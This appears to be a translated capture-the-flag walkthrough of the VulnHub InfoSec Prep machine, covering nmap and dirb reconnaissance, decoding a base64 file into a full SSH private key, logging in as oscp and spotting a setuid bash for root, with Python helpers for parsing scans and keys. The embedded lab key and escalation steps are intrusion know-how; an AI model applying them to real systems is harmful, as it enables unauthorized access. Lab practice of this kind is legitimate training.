InfoSec Prep: VulnHub target machine walkthrough
Preparation: target machine network environment
Target download:
https://www.vulnhub.com/entry/infosec-prep-oscp,508/
It is about 2.8 GB, so the download may take a while.
After downloading, import the .ova file directly into VMware.
Set the network mode to NAT.
Then boot it; the target environment is ready as is.
Information gathering
nmap scan
Check the attacker machine's IP
```text
┌──(test㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.47.156  netmask 255.255.255.0  broadcast 192.168.47.255
        inet6 fe80::20c:29ff:fe05:6523  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:05:65:23  txqueuelen 1000  (Ethernet)
        RX packets 954069  bytes 227034461 (216.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1054162  bytes 106400846 (101.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 3665  bytes 294696 (287.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3665  bytes 294696 (287.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```
So the attacker's IP is 192.168.47.156.
Both VMs are in NAT mode, i.e. attached to the same VMware NAT network, so the target is on the same subnet. Sweep it:
```text
┌──(root㉿kali)-[/home/test]
└─# nmap -sP 192.168.47.0/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-22 20:15 CST
Nmap scan report for 192.168.47.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.000037s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.148
Host is up (0.00010s latency).
MAC Address: 00:0C:29:8C:DF:83 (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.0024s latency).
MAC Address: 00:50:56:E0:C8:5A (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.49 seconds
```
Drop .1, .2 and .254: on a VMware NAT network these are the host's virtual adapter, the NAT gateway and the DHCP server, not guests. The MAC addresses confirm it: the three infrastructure entries carry VMware's 00:50:56 prefix, while the two real VMs (the attacker and the target) carry 00:0C:29. (`-sP` is the old spelling of `-sn`, host discovery without a port scan; nmap still accepts it.)
That leaves the target IP:
192.168.47.148
Now scan all 65535 TCP ports:
```text
┌──(root㉿kali)-[/home/test]
└─# nmap -p- 192.168.47.148 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-22 20:28 CST
Nmap scan report for 192.168.47.148
Host is up (0.000068s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx
MAC Address: 00:0C:29:8C:DF:83 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds
```
Three open ports: SSH, HTTP and 33060, which is the MySQL X protocol port, a hint that a database sits behind the web application. As usual, start by opening port 80 in a browser.
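As an added example (not from the original post), the following Python picks the target out of a sweep like the one above and turns the `-p-` result into a second, targeted scan. It assumes the VMware layout seen here: infrastructure addresses carry the 00:50:56 OUI, guests carry 00:0C:29, and the scanning host is listed without a MAC. The sample outputs are constructed to match the two scans shown; the script builds the follow-up `nmap -sV -sC` command line rather than running nmap itself.

```python
import re
from typing import Dict, List

# VMware's own virtual devices (host adapter .1, NAT device .2, DHCP .254 in the
# sweep above) use the 00:50:56 OUI; auto-assigned guest MACs use 00:0C:29.
# This is an assumption about this lab's layout, not a rule for every network.
INFRA_OUIS = ("00:50:56",)

HOST_RE = re.compile(r"Nmap scan report for (\S+)")
MAC_RE = re.compile(r"MAC Address: ([0-9A-Fa-f:]{17})")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.M)


def parse_sweep(text: str) -> Dict[str, str]:
    """Map IP -> MAC.  nmap prints no MAC line for the scanning host itself."""
    hosts: Dict[str, str] = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.search(line)
        if m:
            current = m.group(1)
            hosts[current] = ""
            continue
        m = MAC_RE.search(line)
        if m and current:
            hosts[current] = m.group(1).upper()
    return hosts


def candidate_targets(sweep: str, attacker_ip: str) -> List[str]:
    """Drop ourselves and the VMware infrastructure; what remains are guest VMs."""
    return [ip for ip, mac in parse_sweep(sweep).items()
            if ip != attacker_ip and mac and not mac.startswith(INFRA_OUIS)]


def open_ports(portscan: str) -> List[int]:
    """Open TCP ports from normal (non-greppable) nmap output."""
    return [int(port) for port, _svc in PORT_RE.findall(portscan)]


def service_scan_cmd(target: str, ports: List[int]) -> List[str]:
    """Phase two: version detection plus default scripts, only on the open ports."""
    return ["nmap", "-sV", "-sC", "-p", ",".join(str(p) for p in ports), target]


# Constructed sample outputs, transcribed from the two scans above
SWEEP = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2024-01-22 20:15 CST
Nmap scan report for 192.168.47.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.000037s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.148
Host is up (0.00010s latency).
MAC Address: 00:0C:29:8C:DF:83 (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.0024s latency).
MAC Address: 00:50:56:E0:C8:5A (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.49 seconds
"""

PORTSCAN = """\
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx
"""

if __name__ == "__main__":
    targets = candidate_targets(SWEEP, "192.168.47.156")
    print("targets:", targets)
    ports = open_ports(PORTSCAN)
    print("open ports:", ports)
    print("next:", " ".join(service_scan_cmd(targets[0], ports)))
```

The MAC addresses are only visible because host discovery on a local segment uses ARP; against a remote subnet the OUI filter has nothing to work with and you fall back to excluding the gateway addresses by hand.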
Directory scan
Next, brute-force directories.
Two tools were used: dirb and dirsearch.
dirb result:
```text
┌──(root㉿kali)-[/home/test]
└─# dirb http://192.168.47.148

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Jan 22 20:36:50 2024
URL_BASE: http://192.168.47.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.47.148/ ----
+ http://192.168.47.148/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.47.148/javascript/
+ http://192.168.47.148/robots.txt (CODE:200|SIZE:36)
+ http://192.168.47.148/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.47.148/wp-admin/
==> DIRECTORY: http://192.168.47.148/wp-content/
==> DIRECTORY: http://192.168.47.148/wp-includes/
+ http://192.168.47.148/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.47.148/javascript/ ----
==> DIRECTORY: http://192.168.47.148/javascript/jquery/

---- Entering directory: http://192.168.47.148/wp-admin/ ----
+ http://192.168.47.148/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.47.148/wp-admin/css/
==> DIRECTORY: http://192.168.47.148/wp-admin/images/
==> DIRECTORY: http://192.168.47.148/wp-admin/includes/
+ http://192.168.47.148/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.47.148/wp-admin/js/
==> DIRECTORY: http://192.168.47.148/wp-admin/maint/
==> DIRECTORY: http://192.168.47.148/wp-admin/network/
==> DIRECTORY: http://192.168.47.148/wp-admin/user/
```
Combining the hints on the page itself with the scan results (wp-admin, wp-content, wp-includes, xmlrpc.php), this is WordPress.
Append /wp-admin to the URL.
Weak passwords don't get us in.
Try something else: the scan also found robots.txt, so read it.
It contains a single entry, /secret.txt.
Fetch secret.txt:
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB d0VBQVFBQUFZRUF0SENzU3pIdFVGOEs4dGlPcUVDUVlMcktLckNSc2J2cTZpSUc3UjlnMFdQdjl3 K2drVVdlCkl6QlNjdmdsTEU5ZmxvbHNLZHhmTVFRYk1WR3FTQURuWUJUYXZhaWdRZWt1ZTBiTHNZ ay9yWjVGaE9VUlpMVHZkbEpXeHoKYklleUM1YTVGMERsOVVZbXpDaGU0M3owRG8waVF3MTc4R0pV UWFxc2NMbUVhdHFJaVQvMkZrRitBdmVXM2hxUGZicnc5dgpBOVFBSVVBM2xlZHFyOFhFelkvL0xx MCtzUWcvcFV1MEtQa1kxOGk2dm5maVlIR2t5VzFTZ3J5UGg1eDlCR1RrM2VSWWNOCnc2bURiQWpY S0tDSEdNK2RubkdOZ3ZBa3FUK2daV3ovTXB5MGVrYXVrNk5QN05Dek9STnJJWEFZRmExcld6YUV0 eXBId1kKa0NFY2ZXSkpsWjcrZmNFRmE1QjdnRXd0L2FLZEZSWFBRd2luRmxpUU1ZTW1hdThQWmJQ aUJJcnh0SVlYeTNNSGNLQklzSgowSFNLditIYktXOWtwVEw1T29Ba0I4ZkhGMzB1alZPYjZZVHVj MXNKS1dSSElaWTNxZTA4STJSWGVFeEZGWXU5b0x1ZzBkCnRIWWRKSEZMN2NXaU52NG1SeUo5UmNy aFZMMVYzQ2F6TlpLS3dyYVJBQUFGZ0g5SlFMMS9TVUM5QUFBQUIzTnphQzF5YzIKRUFBQUdCQUxS d3JFc3g3VkJmQ3ZMWWpxaEFrR0M2eWlxd2tiRzc2dW9pQnUwZllORmo3L2NQb0pGRm5pTXdVbkw0 SlN4UApYNWFKYkNuY1h6RUVHekZScWtnQTUyQVUycjJvb0VIcExudEd5N0dKUDYyZVJZVGxFV1Mw NzNaU1ZzYzJ5SHNndVd1UmRBCjVmVkdKc3dvWHVOODlBNk5Ja01OZS9CaVZFR3FySEM1aEdyYWlJ ay85aFpCZmdMM2x0NGFqMzI2OFBid1BVQUNGQU41WG4KYXEvRnhNMlAveTZ0UHJFSVA2Vkx0Q2o1 R05mSXVyNTM0bUJ4cE1sdFVvSzhqNGVjZlFSazVOM2tXSERjT3BnMndJMXlpZwpoeGpQblo1eGpZ THdKS2svb0dWcy96S2N0SHBHcnBPalQrelFzemtUYXlGd0dCV3RhMXMyaExjcVI4R0pBaEhIMWlT WldlCi9uM0JCV3VRZTRCTUxmMmluUlVWejBNSXB4WllrREdESm1ydkQyV3o0Z1NLOGJTR0Y4dHpC M0NnU0xDZEIwaXIvaDJ5bHYKWktVeStUcUFKQWZIeHhkOUxvMVRtK21FN25OYkNTbGtSeUdXTjZu dFBDTmtWM2hNUlJXTHZhQzdvTkhiUjJIU1J4UyszRgpvamIrSmtjaWZVWEs0VlM5VmR3bXN6V1Np c0sya1FBQUFBTUJBQUVBQUFHQkFMQ3l6ZVp0SkFwYXFHd2I2Y2VXUWt5WFhyCmJqWmlsNDdwa05i VjcwSldtbnhpeFkzMUtqckRLbGRYZ2t6TEpSb0RmWXAxVnUrc0VUVmxXN3RWY0JtNU1abVFPMWlB cEQKZ1VNemx2RnFpRE5MRktVSmRUajdmcXlPQVhEZ2t2OFFrc05tRXhLb0JBakduTTl1OHJSQXlq NVBObzF3QVdLcENMeElZMwpCaGRsbmVOYUFYRFYvY0tHRnZXMWFPTWxHQ2VhSjBEeFNBd0c1Snlz 
NEtpNmtKNUVrZldvOGVsc1VXRjMwd1FrVzl5aklQClVGNUZxNnVkSlBubUVXQXB2THQ2MkllVHZG cWcrdFB0R25WUGxlTzNsdm5DQkJJeGY4dkJrOFd0b0pWSmRKdDNoTzhjNGoKa010WHN2TGdSbHZl MWJaVVpYNU15bUhhbE4vTEExSXNvQzRZa2cvcE1nM3M5Y1lSUmttK0d4aVVVNWJ2OWV6d000Qm1r bwpRUHZ5VWN5ZTI4endrTzZ0Z1ZNWng0b3NySW9OOVd0RFVVZGJkbUQyVUJaMm4zQ1pNa09WOVhK eGVqdTUxa0gxZnM4cTM5ClFYZnhkTmhCYjNZcjJSakNGVUxEeGh3RFNJSHpHN2dmSkVEYVdZY09r TmtJYUhIZ2FWN2t4enlwWWNxTHJzMFM3QzRRQUEKQU1FQWhkbUQ3UXU1dHJ0QkYzbWdmY2RxcFpP cTYrdFc2aGttUjBoWk5YNVo2Zm5lZFV4Ly9RWTVzd0tBRXZnTkNLSzhTbQppRlhsWWZnSDZLLzVV blpuZ0Viak1RTVRkT09sa2JyZ3BNWWloK1pneXZLMUxvT1R5TXZWZ1Q1TE1nakpHc2FRNTM5M00y CnlVRWlTWGVyN3E5ME42VkhZWERKaFVXWDJWM1FNY0NxcHRTQ1MxYlNxdmttTnZoUVhNQWFBUzhB SncxOXFYV1hpbTE1U3AKV29xZGpvU1dFSnhLZUZUd1VXN1dPaVlDMkZ2NWRzM2NZT1I4Um9yYm1H bnpkaVpneFpBQUFBd1FEaE5YS21TMG9WTWREeQozZktaZ1R1d3I4TXk1SHlsNWpyYTZvd2ovNXJK TVVYNnNqWkVpZ1phOTZFamNldlpKeUdURjJ1Vjc3QVEyUnF3bmJiMkdsCmpkTGtjMFl0OXVicVNp a2Q1ZjhBa1psWkJzQ0lydnVEUVpDb3haQkd1RDJEVVd6T2dLTWxmeHZGQk5RRitMV0ZndGJyU1AK T2dCNGloZFBDMSs2RmRTalFKNzdmMWJOR0htbjBhbW9pdUpqbFVPT1BMMWNJUHp0MGh6RVJMajJx djlEVWVsVE9VcmFuTwpjVVdyUGdyelZHVCtRdmtrakdKRlgrcjh0R1dDQU9RUlVBQUFEQkFNMGNS aERvd09GeDUwSGtFK0hNSUoyalFJZWZ2d3BtCkJuMkZONmt3NEdMWmlWY3FVVDZhWTY4bmpMaWh0 RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
This looks like base64; decode it. (The decoded key below is shown run together on the page; in the actual file the BEGIN and END lines stand on their own lines and each 70-character chunk between them is one line.)
-----BEGIN OPENSSH PRIVATE KEY----- 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 8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A= -----END OPENSSH PRIVATE KEY-----
SSH private key leak
This is a leaked OpenSSH private key, i.e. a credential for logging in over SSH. Keep it for now; we don't yet know which user it belongs to.
We still haven't actually read the content of the web page, and it may hold something we can use.
I can't read the English, so I'll run it through Google Translate.
The username is oscp, and the goal is to get into /root, which means going from the oscp user to root.
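The key is stored in OpenSSH's own openssh-key-v1 container, which carries useful metadata in the clear: the cipher name ("none" means the key is unencrypted and needs no passphrase), the key type, the public key (and therefore the fingerprint `ssh-keygen -l` would print) and, for unencrypted keys, the comment recorded when the key was generated. The trailing bytes of the key on this page decode to the comment oscp@oscp, so the key itself already names the user. The parser below is an added example, not the original post's code. It handles only RSA and Ed25519 keys; `build_key` exists solely to produce synthetic keys for testing, and no real key material is embedded.

```python
import base64
import hashlib
import os
import stat
import struct
import sys
from typing import Dict, List, Tuple

PEM_HEAD = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_TAIL = "-----END OPENSSH PRIVATE KEY-----"
MAGIC = b"openssh-key-v1\x00"
# Private fields that precede the comment, per key type (RSA: n e d iqmp p q;
# Ed25519: pk sk).  Assumption: only these two key types are handled.
PRIVATE_FIELDS = {b"ssh-rsa": 6, b"ssh-ed25519": 2}


def _string(buf: bytes, off: int) -> Tuple[bytes, int]:
    """Read one SSH 'string': uint32 big-endian length followed by that many bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def _s(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def pem_to_blob(text: str) -> bytes:
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if len(lines) < 3 or lines[0] != PEM_HEAD or lines[-1] != PEM_TAIL:
        raise ValueError("not a complete OpenSSH private key: copy both armor lines too")
    return base64.b64decode("".join(lines[1:-1]))


def parse_openssh_key(text: str) -> Dict[str, object]:
    blob = pem_to_blob(text)
    if not blob.startswith(MAGIC):
        raise ValueError("bad magic; not an openssh-key-v1 container")
    off = len(MAGIC)
    cipher, off = _string(blob, off)
    kdf, off = _string(blob, off)
    _kdfopts, off = _string(blob, off)
    (nkeys,) = struct.unpack_from(">I", blob, off)
    if nkeys != 1:
        raise ValueError("expected exactly one key in the container")
    pub, off = _string(blob, off + 4)
    priv, off = _string(blob, off)
    keytype, _ = _string(pub, 0)
    # Same fingerprint ssh-keygen -l prints: SHA256 of the public blob, unpadded base64
    fp = base64.b64encode(hashlib.sha256(pub).digest()).rstrip(b"=").decode()
    info: Dict[str, object] = {
        "cipher": cipher.decode(), "kdf": kdf.decode(),
        "encrypted": cipher != b"none", "type": keytype.decode(),
        "fingerprint": "SHA256:" + fp, "comment": None,
    }
    if info["encrypted"]:
        return info  # private section is ciphertext; the comment needs the passphrase
    c1, c2 = struct.unpack_from(">II", priv, 0)
    if c1 != c2:
        raise ValueError("checkint mismatch: truncated or corrupted key")
    p = 8
    ptype, p = _string(priv, p)
    for _ in range(PRIVATE_FIELDS[ptype]):
        _, p = _string(priv, p)  # skip the key numbers; only the comment is wanted
    comment, _ = _string(priv, p)
    info["comment"] = comment.decode(errors="replace")
    return info


def write_key_file(text: str, path: str) -> int:
    """Write the key with owner-only permissions (what ssh insists on); returns the mode."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(text if text.endswith("\n") else text + "\n")
    os.chmod(path, 0o600)  # in case the file already existed with wider permissions
    return stat.S_IMODE(os.stat(path).st_mode)


def build_key(keytype: bytes, pub_fields: List[bytes], priv_fields: List[bytes],
              comment: bytes, cipher: bytes = b"none") -> str:
    """Encoder for the same container format; used only to make synthetic test keys."""
    pub = _s(keytype) + b"".join(_s(f) for f in pub_fields)
    priv = struct.pack(">II", 0x5A5A5A5A, 0x5A5A5A5A) + _s(keytype)
    priv += b"".join(_s(f) for f in priv_fields) + _s(comment)
    if len(priv) % 8:  # pad to the cipher block size with 1, 2, 3, ...
        priv += bytes(range(1, 9 - len(priv) % 8))
    kdf = b"none" if cipher == b"none" else b"bcrypt"
    blob = MAGIC + _s(cipher) + _s(kdf) + _s(b"") + struct.pack(">I", 1) + _s(pub) + _s(priv)
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"{PEM_HEAD}\n{body}\n{PEM_TAIL}\n"


if __name__ == "__main__":
    # usage: python3 keytriage.py decoded_secret.txt id_leaked   (names are hypothetical)
    data = open(sys.argv[1]).read()
    for k, v in parse_openssh_key(data).items():
        print(f"{k:12} {v}")
    print("written", sys.argv[2], "with mode", oct(write_key_file(data, sys.argv[2])))
```

Run it on the decoded secret.txt; the copy it writes already has mode 0600, which is the permission ssh requires before it will load a private key at all.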
SSH login with the leaked private key
Now use the key. Save the entire decoded text, from the BEGIN line to the END line inclusive, into a file; a partial copy is rejected as an invalid key. Then connect as oscp with ssh -i.
Paste the key into a file:
```text
┌──(root㉿kali)-[/home/test/桌面]
└─# chmod 777 ssh.ssh

┌──(root㉿kali)-[/home/test/桌面]
└─# ssh -i ssh.ssh oscp@192.168.47.148
The authenticity of host '192.168.47.148 (192.168.47.148)' can't be established.
ED25519 key fingerprint is SHA256:OORLHLygIlTRZ4nXi9nq+WIrJ26fv7tfgvVHm8FaAzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.47.148' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0777 for 'ssh.ssh' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ssh.ssh": bad permissions
oscp@192.168.47.148: Permission denied (publickey).
```
The login fails, and the message says why: ssh refuses to load a private key that other users can read or write, and chmod 777 made it world-accessible. The fix is the opposite: restrict the file to its owner with chmod 600 ssh.ssh, then retry.
```text
┌──(root㉿kali)-[/home/test/桌面]
└─# ssh -i ssh.ssh oscp@192.168.47.148
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 22 Jan 2024 01:01:19 PM UTC

  System load:  0.0               Processes:             212
  Usage of /:   27.1% of 19.56GB  Users logged in:       0
  Memory usage: 71%               IPv4 address for eth0: 192.168.47.148
  Swap usage:   0%

0 updates can be installed immediately.
0 of these updates are security updates.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1
-bash-5.0$
```
The SSH login works. A quick look around:
```text
-bash-5.0$ ls
ip
-bash-5.0$ cd /
-bash-5.0$ ls
bin    cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  swap.img  tmp  var
boot   dev    home  lib32  libx32  media       opt  root  sbin  srv   sys       usr
-bash-5.0$ cd /root
-bash: cd: /root: Permission denied
-bash-5.0$ whoami
oscp
-bash-5.0$ pwd
/
-bash-5.0$ getuid
-bash: getuid: command not found
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
-bash-5.0$
```
Privilege escalation: setuid bash with -p
To read /root we have to escalate, because oscp is an ordinary user. The id output is worth a second look: oscp is in the sudo group (useful only with the account's password, which we don't have) and in the lxd group (a well-known path to root on its own). Here we take the SUID route instead.
List the files with the SUID bit set:
```text
find / -perm -4000 -type f 2>/dev/null
```
```text
-bash-5.0$ find / -perm -4000 -type f 2>/dev/null
/snap/core22/1033/usr/bin/chfn
/snap/core22/1033/usr/bin/chsh
/snap/core22/1033/usr/bin/gpasswd
/snap/core22/1033/usr/bin/mount
/snap/core22/1033/usr/bin/newgrp
/snap/core22/1033/usr/bin/passwd
/snap/core22/1033/usr/bin/su
/snap/core22/1033/usr/bin/sudo
/snap/core22/1033/usr/bin/umount
/snap/core22/1033/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1033/usr/lib/openssh/ssh-keysign
/snap/snapd/20671/usr/lib/snapd/snap-confine
/snap/snapd/8140/usr/lib/snapd/snap-confine
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/1754/bin/mount
/snap/core18/1754/bin/ping
/snap/core18/1754/bin/su
/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
```
Among the usual entries (passwd, sudo, mount and friends, plus their duplicates inside the /snap images) one stands out: /usr/bin/bash is setuid root. A setuid-root bash hands out root, but only if it is started with -p.
